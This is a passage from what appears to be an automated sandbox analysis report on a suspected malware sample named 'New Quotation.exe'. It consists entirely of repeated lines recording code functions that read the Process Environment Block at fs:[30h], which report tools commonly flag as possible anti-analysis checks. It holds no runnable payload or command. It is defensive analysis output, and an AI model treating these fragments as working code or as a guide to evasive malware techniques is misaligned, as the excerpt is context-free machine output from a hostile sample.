      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D806CC0 mov eax, dword ptr fs:[00000030h]7_2_1D806CC0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C8C3D mov eax, dword ptr fs:[00000030h]7_2_1D7C8C3D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D809CCF mov eax, dword ptr fs:[00000030h]7_2_1D809CCF
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80CCD1 mov ecx, dword ptr fs:[00000030h]7_2_1D80CCD1
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80CCD1 mov eax, dword ptr fs:[00000030h]7_2_1D80CCD1
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80CCD1 mov eax, dword ptr fs:[00000030h]7_2_1D80CCD1
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D863CD4 mov eax, dword ptr fs:[00000030h]7_2_1D863CD4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D863CD4 mov eax, dword ptr fs:[00000030h]7_2_1D863CD4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D863CD4 mov ecx, dword ptr fs:[00000030h]7_2_1D863CD4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D863CD4 mov eax, dword ptr fs:[00000030h]7_2_1D863CD4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D863CD4 mov eax, dword ptr fs:[00000030h]7_2_1D863CD4
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D855CD0 mov eax, dword ptr fs:[00000030h]7_2_1D855CD0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A4CD2 mov eax, dword ptr fs:[00000030h]7_2_1D8A4CD2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E3C20 mov eax, dword ptr fs:[00000030h]7_2_1D7E3C20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EAC20 mov eax, dword ptr fs:[00000030h]7_2_1D7EAC20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EAC20 mov eax, dword ptr fs:[00000030h]7_2_1D7EAC20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EAC20 mov eax, dword ptr fs:[00000030h]7_2_1D7EAC20
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D850CEE mov eax, dword ptr fs:[00000030h]7_2_1D850CEE
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D867CE8 mov eax, dword ptr fs:[00000030h]7_2_1D867CE8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84CCF0 mov ecx, dword ptr fs:[00000030h]7_2_1D84CCF0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FECF3 mov eax, dword ptr fs:[00000030h]7_2_1D7FECF3
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FECF3 mov eax, dword ptr fs:[00000030h]7_2_1D7FECF3
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C7CF1 mov eax, dword ptr fs:[00000030h]7_2_1D7C7CF1
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D3CF0 mov eax, dword ptr fs:[00000030h]7_2_1D7D3CF0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D3CF0 mov eax, dword ptr fs:[00000030h]7_2_1D7D3CF0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D802C10 mov eax, dword ptr fs:[00000030h]7_2_1D802C10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D802C10 mov eax, dword ptr fs:[00000030h]7_2_1D802C10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D802C10 mov eax, dword ptr fs:[00000030h]7_2_1D802C10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D802C10 mov eax, dword ptr fs:[00000030h]7_2_1D802C10
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7F8CDF mov eax, dword ptr fs:[00000030h]7_2_1D7F8CDF
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7F8CDF mov eax, dword ptr fs:[00000030h]7_2_1D7F8CDF
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EDCD1 mov eax, dword ptr fs:[00000030h]7_2_1D7EDCD1
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EDCD1 mov eax, dword ptr fs:[00000030h]7_2_1D7EDCD1
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EDCD1 mov eax, dword ptr fs:[00000030h]7_2_1D7EDCD1
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D895C38 mov eax, dword ptr fs:[00000030h]7_2_1D895C38
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D895C38 mov ecx, dword ptr fs:[00000030h]7_2_1D895C38
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7DFCC9 mov eax, dword ptr fs:[00000030h]7_2_1D7DFCC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C6CC0 mov eax, dword ptr fs:[00000030h]7_2_1D7C6CC0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C6CC0 mov eax, dword ptr fs:[00000030h]7_2_1D7C6CC0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C6CC0 mov eax, dword ptr fs:[00000030h]7_2_1D7C6CC0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D804C3D mov eax, dword ptr fs:[00000030h]7_2_1D804C3D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D867C38 mov eax, dword ptr fs:[00000030h]7_2_1D867C38
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D853C57 mov eax, dword ptr fs:[00000030h]7_2_1D853C57
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A4C59 mov eax, dword ptr fs:[00000030h]7_2_1D8A4C59
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D7C95 mov eax, dword ptr fs:[00000030h]7_2_1D7D7C95
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D7C95 mov eax, dword ptr fs:[00000030h]7_2_1D7D7C95
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80BC6E mov eax, dword ptr fs:[00000030h]7_2_1D80BC6E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80BC6E mov eax, dword ptr fs:[00000030h]7_2_1D80BC6E
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C7C85 mov eax, dword ptr fs:[00000030h]7_2_1D7C7C85
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C7C85 mov eax, dword ptr fs:[00000030h]7_2_1D7C7C85
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C7C85 mov eax, dword ptr fs:[00000030h]7_2_1D7C7C85
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C7C85 mov eax, dword ptr fs:[00000030h]7_2_1D7C7C85
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C7C85 mov eax, dword ptr fs:[00000030h]7_2_1D7C7C85
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CEF79 mov eax, dword ptr fs:[00000030h]7_2_1D7CEF79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CEF79 mov eax, dword ptr fs:[00000030h]7_2_1D7CEF79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CEF79 mov eax, dword ptr fs:[00000030h]7_2_1D7CEF79
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CBF70 mov eax, dword ptr fs:[00000030h]7_2_1D7CBF70
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D1F70 mov eax, dword ptr fs:[00000030h]7_2_1D7D1F70
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FAF72 mov eax, dword ptr fs:[00000030h]7_2_1D7FAF72
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D858F8B mov eax, dword ptr fs:[00000030h]7_2_1D858F8B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D858F8B mov eax, dword ptr fs:[00000030h]7_2_1D858F8B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D858F8B mov eax, dword ptr fs:[00000030h]7_2_1D858F8B
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D808FBC mov eax, dword ptr fs:[00000030h]7_2_1D808FBC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EDF36 mov eax, dword ptr fs:[00000030h]7_2_1D7EDF36
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EDF36 mov eax, dword ptr fs:[00000030h]7_2_1D7EDF36
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EDF36 mov eax, dword ptr fs:[00000030h]7_2_1D7EDF36
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7EDF36 mov eax, dword ptr fs:[00000030h]7_2_1D7EDF36
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CFF30 mov edi, dword ptr fs:[00000030h]7_2_1D7CFF30
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D851FC9 mov eax, dword ptr fs:[00000030h]7_2_1D851FC9
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FFDC mov eax, dword ptr fs:[00000030h]7_2_1D84FFDC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FFDC mov eax, dword ptr fs:[00000030h]7_2_1D84FFDC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FFDC mov eax, dword ptr fs:[00000030h]7_2_1D84FFDC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FFDC mov ecx, dword ptr fs:[00000030h]7_2_1D84FFDC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FFDC mov eax, dword ptr fs:[00000030h]7_2_1D84FFDC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FFDC mov eax, dword ptr fs:[00000030h]7_2_1D84FFDC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88EFD3 mov eax, dword ptr fs:[00000030h]7_2_1D88EFD3
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A4FFF mov eax, dword ptr fs:[00000030h]7_2_1D8A4FFF
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7ECF00 mov eax, dword ptr fs:[00000030h]7_2_1D7ECF00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7ECF00 mov eax, dword ptr fs:[00000030h]7_2_1D7ECF00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7F8FFB mov eax, dword ptr fs:[00000030h]7_2_1D7F8FFB
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FF03 mov eax, dword ptr fs:[00000030h]7_2_1D84FF03
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FF03 mov eax, dword ptr fs:[00000030h]7_2_1D84FF03
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FF03 mov eax, dword ptr fs:[00000030h]7_2_1D84FF03
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80BF0C mov eax, dword ptr fs:[00000030h]7_2_1D80BF0C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80BF0C mov eax, dword ptr fs:[00000030h]7_2_1D80BF0C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80BF0C mov eax, dword ptr fs:[00000030h]7_2_1D80BF0C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A4F1D mov eax, dword ptr fs:[00000030h]7_2_1D8A4F1D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D810F16 mov eax, dword ptr fs:[00000030h]7_2_1D810F16
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D810F16 mov eax, dword ptr fs:[00000030h]7_2_1D810F16
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D810F16 mov eax, dword ptr fs:[00000030h]7_2_1D810F16
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D810F16 mov eax, dword ptr fs:[00000030h]7_2_1D810F16
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov ecx, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov ecx, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov ecx, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov ecx, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E6FE0 mov eax, dword ptr fs:[00000030h]7_2_1D7E6FE0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7C9FD0 mov eax, dword ptr fs:[00000030h]7_2_1D7C9FD0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D858F3C mov eax, dword ptr fs:[00000030h]7_2_1D858F3C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D858F3C mov eax, dword ptr fs:[00000030h]7_2_1D858F3C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D858F3C mov ecx, dword ptr fs:[00000030h]7_2_1D858F3C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D858F3C mov ecx, dword ptr fs:[00000030h]7_2_1D858F3C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CBFC0 mov eax, dword ptr fs:[00000030h]7_2_1D7CBFC0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88BF4D mov eax, dword ptr fs:[00000030h]7_2_1D88BF4D
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D4FB6 mov eax, dword ptr fs:[00000030h]7_2_1D7D4FB6
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FCFB0 mov eax, dword ptr fs:[00000030h]7_2_1D7FCFB0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FCFB0 mov eax, dword ptr fs:[00000030h]7_2_1D7FCFB0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D1FAA mov eax, dword ptr fs:[00000030h]7_2_1D7D1FAA
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88AF50 mov ecx, dword ptr fs:[00000030h]7_2_1D88AF50
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FBF93 mov eax, dword ptr fs:[00000030h]7_2_1D7FBF93
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88EF66 mov eax, dword ptr fs:[00000030h]7_2_1D88EF66
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov ecx, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7E0F90 mov eax, dword ptr fs:[00000030h]7_2_1D7E0F90
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D826F70 mov eax, dword ptr fs:[00000030h]7_2_1D826F70
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A4F7C mov eax, dword ptr fs:[00000030h]7_2_1D8A4F7C
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D1E70 mov eax, dword ptr fs:[00000030h]7_2_1D7D1E70
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CBE60 mov eax, dword ptr fs:[00000030h]7_2_1D7CBE60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CBE60 mov eax, dword ptr fs:[00000030h]7_2_1D7CBE60
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80CEA0 mov eax, dword ptr fs:[00000030h]7_2_1D80CEA0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D890EAD mov eax, dword ptr fs:[00000030h]7_2_1D890EAD
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D890EAD mov eax, dword ptr fs:[00000030h]7_2_1D890EAD
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7FEE48 mov eax, dword ptr fs:[00000030h]7_2_1D7FEE48
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D802EB8 mov eax, dword ptr fs:[00000030h]7_2_1D802EB8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D802EB8 mov eax, dword ptr fs:[00000030h]7_2_1D802EB8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CDE45 mov eax, dword ptr fs:[00000030h]7_2_1D7CDE45
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CDE45 mov ecx, dword ptr fs:[00000030h]7_2_1D7CDE45
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CFE40 mov eax, dword ptr fs:[00000030h]7_2_1D7CFE40
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CAE40 mov eax, dword ptr fs:[00000030h]7_2_1D7CAE40
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CAE40 mov eax, dword ptr fs:[00000030h]7_2_1D7CAE40
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CAE40 mov eax, dword ptr fs:[00000030h]7_2_1D7CAE40
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D857EC3 mov eax, dword ptr fs:[00000030h]7_2_1D857EC3
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D857EC3 mov ecx, dword ptr fs:[00000030h]7_2_1D857EC3
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A4EC1 mov eax, dword ptr fs:[00000030h]7_2_1D8A4EC1
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D2E32 mov eax, dword ptr fs:[00000030h]7_2_1D7D2E32
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D80BED0 mov eax, dword ptr fs:[00000030h]7_2_1D80BED0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D811ED8 mov eax, dword ptr fs:[00000030h]7_2_1D811ED8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D899ED2 mov eax, dword ptr fs:[00000030h]7_2_1D899ED2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CBE18 mov ecx, dword ptr fs:[00000030h]7_2_1D7CBE18
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D3E14 mov eax, dword ptr fs:[00000030h]7_2_1D7D3E14
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D3E14 mov eax, dword ptr fs:[00000030h]7_2_1D7D3E14
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D3E14 mov eax, dword ptr fs:[00000030h]7_2_1D7D3E14
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D801EED mov eax, dword ptr fs:[00000030h]7_2_1D801EED
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D801EED mov eax, dword ptr fs:[00000030h]7_2_1D801EED
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D801EED mov eax, dword ptr fs:[00000030h]7_2_1D801EED
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D88EEE7 mov eax, dword ptr fs:[00000030h]7_2_1D88EEE7
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D873EFC mov eax, dword ptr fs:[00000030h]7_2_1D873EFC
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D3E01 mov eax, dword ptr fs:[00000030h]7_2_1D7D3E01
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]7_2_1D7D6E00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]7_2_1D7D6E00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]7_2_1D7D6E00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D6E00 mov eax, dword ptr fs:[00000030h]7_2_1D7D6E00
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D8A4E03 mov eax, dword ptr fs:[00000030h]7_2_1D8A4E03
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]7_2_1D7CCEF0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]7_2_1D7CCEF0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]7_2_1D7CCEF0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]7_2_1D7CCEF0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]7_2_1D7CCEF0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7CCEF0 mov eax, dword ptr fs:[00000030h]7_2_1D7CCEF0
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D808E15 mov eax, dword ptr fs:[00000030h]7_2_1D808E15
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]7_2_1D7D2EE8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]7_2_1D7D2EE8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]7_2_1D7D2EE8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D2EE8 mov eax, dword ptr fs:[00000030h]7_2_1D7D2EE8
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FE1F mov eax, dword ptr fs:[00000030h]7_2_1D84FE1F
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FE1F mov eax, dword ptr fs:[00000030h]7_2_1D84FE1F
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FE1F mov eax, dword ptr fs:[00000030h]7_2_1D84FE1F
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D84FE1F mov eax, dword ptr fs:[00000030h]7_2_1D84FE1F
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D7D3EE2 mov eax, dword ptr fs:[00000030h]7_2_1D7D3EE2
      Source: C:\Users\user\Desktop\New Quotation.exeCode function: 7_2_1D898E26 mov eax, dword ptr fs:[00000030h]7_2_1D898E26
